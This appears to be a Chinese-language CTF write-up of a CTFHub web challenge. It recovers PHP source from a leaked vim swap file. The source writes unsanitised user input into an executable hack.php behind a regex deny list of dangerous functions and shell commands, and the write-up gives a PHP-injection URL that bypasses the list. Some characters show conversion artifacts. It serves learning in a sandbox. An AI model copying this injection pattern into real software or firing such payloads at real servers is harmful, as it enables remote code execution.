復現(xiàn)環(huán)境

https://www.ctfhub.com/#/challenge

考察知識點

代碼審計
正則表達式繞過

解題分析

訪問robots.txt發(fā)現(xiàn)提示 1ndexx.php

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/robots.txt

robots.txt

直接訪問不到，需要訪問vim的保存的緩沖類型文件.swp，訪問之后獲取到源碼。

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

.1ndexx.php.swp

把關鍵代碼粘貼出來看一下運行流程

打開flag.php讀取文件內容
打開hack.php文件，獲取code參數(shù)
正則匹配危險函數(shù)
字符串長度不能超過33
將code參數(shù)的內容寫入hack.php
將flag.php內容寫入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

測試：輸出phpinfo()，phpinfo不是過濾函數(shù)，傳入之后訪問hack.php可利用成功

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?=phpinfo();?%3E